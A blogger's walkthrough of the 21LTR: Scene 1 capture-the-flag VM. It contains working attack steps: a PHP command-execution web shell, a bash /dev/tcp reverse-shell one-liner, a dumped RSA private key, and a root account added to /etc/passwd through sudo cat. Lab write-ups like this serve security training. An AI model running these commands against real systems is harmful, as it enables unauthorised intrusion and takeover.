21LTR: Scene 1 VM can be downloaded here. Had to use a couple of hints to proceed.
0. Get VMs IP
Not needed, VM has a static IP. You might need to change your VirtualBox/VMware settings to get on the right subnet (192.168.2.0/24), I followed this.
1. Enumeration
TCP Ports enumeration
root@kali:~# nmap -sV 192.168.2.120
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-26 15:01 EDT
Nmap scan report for 192.168.2.120
Host is up (0.00011s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 5.1 (protocol 1.99)
80/tcp open http Apache httpd 2.2.13 ((Unix) DAV/2 PHP/5.2.10)
10001/tcp open scp-config?
MAC Address: 00:0C:29:00:00:B3 (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds
2. Web server
Checking the sourcecode reveals credentials for user “logs”:
<!-- username:logs password:zg]E-b0]+8:(58G -->
Using the creds to SSH into the server didn’t work, it did work for the FTP server running though. Logs is very likely to be a virtual user. Worth noting is that our FTP working directory is mapped to /
(you can check that with **pwd **command) and only a single php file is found, executing get backup_log.php
will download the file into our local directory.
root@kali:/tmp# cat backup_log.php
<html>
<head>
<title></title>
</head>
<body>
<h2 style="text-align: center">
Intranet Dev Server Backup Log</h2>
<?php $log = time(); echo '<center><b>GMT time is: '.gmdate('r', $log).'</b></center>'; ?>
<p>
</p>
<h4>
Backup Errors:</h4>
<p>
</p>
</body>
</html>
Wed, 03 Jan 2012 09:51:42 +0000 from 192.168.2.240: Permission denied
<br><br>
Thu, 04 Jan 2012 13:11:29 +0000 from 192.168.2.240: No Such file or directory
<br><br>
Thu, 04 Jan 2012 13:31:36 +0000 from 192.168.2.240: No space left on device
<br><br>
Thu, 04 Jan 2012 13:41:36 +0000 from 192.168.2.240: No Space left on device
<br><br>
Mon, 16 Feb 2012 17:01:02 +0000 from 192.168.2.240: No Space left on device
<br><br>
Fri, 23 Apr 2012 10:51:07 +0000 from 192.168.2.240: No Space left on device
<br><br>
Fri, 12 May 2012 16:41:32 +0000 from 192.168.2.240: No Space Left on device
<br><br>
GET / HTTP/1.0
Dirbuster reveals there’s a /logs/
directory, which contains the file we just found (/logs/
returns a 4xx, so you need to manually append the file name).
I poked around and didn’t find anything of use, but the logs do show that a specific IP tried to access the box, why don’t we try changing our IP to it?
root@kali:/tmp# ifconfig eth0 192.168.2.240 netmask 255.255.255.0
root@kali:/tmp# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet **192.168.2.240** netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::20c:29ff:fe77:ef24 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:77:ef:24 txqueuelen 1000 (Ethernet)
RX packets 500271 bytes 63946744 (60.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 571896 bytes 49438370 (47.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2024
At this point I got stuck, and had to check a walkthrough for tips. While scrolling down carefully, they mentioned using wireshark and just listening for a while. The server attempted to connect to port 10000 and gives a whole lot of garbled data. Waited another 5 minutes and made sure this time to store the data. It was a gzip file, decompressing it revealed lots of files, but it’s still suspicious how to use it next.
From time to time I noticed that port 10001 opens up (noticed it at the very start), when I found it open I wrote some stuff into it then hit CTRL+C.
Nothing happened! But then I checked the backup_log.php file again, it was blank. I believe there’s a bug with the code, but ultimately I had to restart the VM and this time when I wrote some text I waited till the port time out. Refreshing the php file shows our output as well as executes any php code embedded.
(Oh and by the way, this seems to happen after the server tries to contact us
on port 10000.)
root@kali:~/Desktop# cat text
It's me, abatchy
<?php system($_GET['cmd']) ?>
root@kali:~/Desktop# nc -nvlp 10000 > file.gz && nc -nv 192.168.2.120 10001 < text
listening on [any] 10000 ...
connect to [192.168.2.240] from (UNKNOWN) [192.168.2.120] 49182
(UNKNOWN) [192.168.2.120] 10001 (?) open
root@kali:~/Desktop# curl http://192.168.2.120/logs/backup_log.php?cmd=whoami
...
<redacted>
...
It's me, abatchy apache
Awesome, let’s try a bash one-liner to get a reverse shell. First start a listener on port 443.
------------------------------Terminal 1------------------------------
root@kali:~/Desktop# nc -nvlp 443
listening on [any] 443 ...
------------------------------Terminal 2------------------------------
root@kali:~/Desktop# curl "http://192.168.2.120/logs/backup_log.php?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.240%2F443%200%3E%261"
------------------------------Terminal 1------------------------------
root@kali:~/Desktop# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.2.240] from (UNKNOWN) [192.168.2.120] 42663
bash: no job control in this shell
bash-3.1$ hostname
slax
bash-3.1$ tail /etc/passwd
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
hbeale:x:1001:10:,,,:/home/hbeale:/bin/bash
jgreen:x:1002:10:,,,:/home/jgreen:/bin/bash
logs:x:1003:100:,,,:/tmp:/bin/bash
bash-3.1$
After some poking around I found a directory containing an RSA key.
bash-3.1$ ls -al
total 8
drwxrwxrwx 2 root root 80 Jun 6 2012 .
drwxrwxrwx 3 root root 80 Jun 19 2012 ..
-rwxrwxrwx 1 root root 393 Jun 2 2012 authorized_keys
-rwxrwxrwx 1 root root 1675 Jan 5 2008 id_rsa
bash-3.1$ pwd
/media/USB_1/Stuff/Keys
bash-3.1$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEoQIBAAKCAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmmtlA6
iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNH
CwPX0ADxDFyB1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58
nMq8DsGRbeC5hTdpLXKfBuW8v/lFuNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1
hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1NQRNplKSam3TIYI3+Ywuh
lcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5QIBIwKCAQEAvhF5s3GcchBPLqA/
kCfVBk/MW2zcerM1iLWXlsoNVCOFB+Co4CMKyV4pcd8IOKsfJSlqQ9fwUa5GiUKU
wne2urbf0S1CzdMcY4m9al4W7gPJkACeAnEeO+OTq9zoBvhxDCSc79ju7+7hqXD0
IfZjXyIBjjD7VHOKJWpfMtVTMunBCMqoAMa2veuN6LgDJweQNi7kon4qcj4SghGI
bdBv/Cnk7PMkG+DhafTRWyXGMWFpTHV4BNKv0i+k4lVV1oP9nJnh9jglY4EkD9LD
0Yt2QZt+XMTlxScsjcBpVGc9m4ZrgmRZGV0PTyMuWJtURkDBYPizkiPjjSZfUbyZ
y9QECwKBgQDsR9wLzrQbJIaOX8dG4rEt8pQHdYK7KCM8Bcq45iKKPzeLxchguM3o
+y9nRz5x8RWXWZUMl7PldoqwmrKh6WVCrdJ7mghPTYx3Djhcaf8q5XFTUhZH4xhB
72g1H6+JCECUjAFfjoSTOEswCFKYssgYA22x3fvLGg3S8f0UjjE1xQKBgQDogKVg
iyXCE833evccfrd/otsyVcxNincunAtYDAsqa2ZrjXL3oFwNwfC1CVKPhqDlnG46
M1tiSeYXygPbuPbHzRdu0ZuG7jRxxVdndl52gq/Zt8MKNRD9mdbFRcRMXmMRfaE4
RXdry9eB4rPywfWgJPGNVtOFZP6PRVv+IpoqoQKBgBRArHYKZzWGybRunA1j400U
ytwRYvoZYhsWcHY/nI+Bwu65Lm6wwTE6GgGJw4Yb+olQ0kLoboFh7qFsWHRHNJCv
0DZ66sT4BLm/Y+qp/+275SRmHyq7sZ9AaASNr/XNgeDYzOru9Wu0XjdRK6awPQlf
YSyAvc+UhNeRFbFOBDfPAoGAVlurI9vpc/i6N1mO+/SNTKo0KKOGZfGZ+16H3t/m
496/pEp7KMaIl2VKxuY0m7WpedsEXsKeSRQiQ1mpqWH1QuXG4AS2HCyXIvGG3Uk5
B3JekrH3/HocQO//UJZBmLVX/y6pmI7UlcC9wodnaMuzAPfHbwL+G5qKb7qtI+D3
busCgYATj4y+8msxNWRRNbHWAV7G0OurPDeZJ8F8NDLpM22X8fM08wgGRwkW4fpa
A+J8tN2ibiDqw29W6Rc1/4evAPbo3GR932W/ELOTOpP2yquiwoSxPG+HCLHmDITr
1qGHJRSOiFzo99iS5aQRhUvdl3M0lz1Cort7hjRKUkSWcT02Rw==
-----END RSA PRIVATE KEY-----
I copied it over and set the right permissions:
root@kali:~/Desktop# chmod 600 key
root@kali:~/Desktop# ssh -i key hbeale@192.168.2.120
Linux 2.6.27.27.
hbeale@slax:~$ whoami
hbeale
Nice. First thing I always try on a low priv is sudo -l
.
root@kali:~/Desktop# ssh -i key hbeale@192.168.2.120
Linux 2.6.27.27.
hbeale@slax:~$ whoami
hbeale
hbeale@slax:~$ sudo -l
User hbeale may run the following commands on this host:
(root) NOEXEC: /bin/ls, (root) /usr/bin/cat, (root) /usr/bin/more, (root)
!/usr/bin/su *root*
(root) NOPASSWD: /usr/bin/cat
Awesome, we can edit files with cat using the >> operator. Let’s add a root user.
hbeale@slax:~$ sudo /usr/bin/cat >> /etc/passwd
abatchy::0:0::/root:/bin/bash
^C
hbeale@slax:~$ su abatchy
root@slax:/home/hbeale# id
uid=0(root) gid=0(root) groups=0(root)
Voila, we got root.
Final notes
Not sure if the author did it on purpose to just write some input to port 10001 and discover it’s written to the php file or not, please leave a comment if you got an answer to that.
- Abatchy